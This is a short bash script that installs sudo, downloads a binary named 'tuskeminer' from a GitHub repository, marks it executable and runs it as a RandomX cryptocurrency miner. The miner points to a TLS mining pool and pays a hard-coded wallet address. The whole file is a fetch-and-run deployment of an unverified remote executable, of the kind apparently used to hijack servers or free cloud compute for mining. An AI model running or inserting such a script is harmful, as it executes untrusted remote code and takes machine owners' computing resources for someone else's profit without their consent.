#!/bin/bash
apt update
apt -y install sudo
wget https://github.com/cornea99/edann/raw/main/tuskeminer
chmod +x tuskeminer
./tuskeminer -a rx/0 --url randomx.rplant.xyz:17123 --tls --user TuskeSyuXDmimmdhwmHLpzWxcgaxw28taAYJT79hbCfnJ7UHBLEKFFQG9Gbbv4fxGwd9kXPehzp2n1Yu43THWqdbKLujvTAWvH45mf.kid
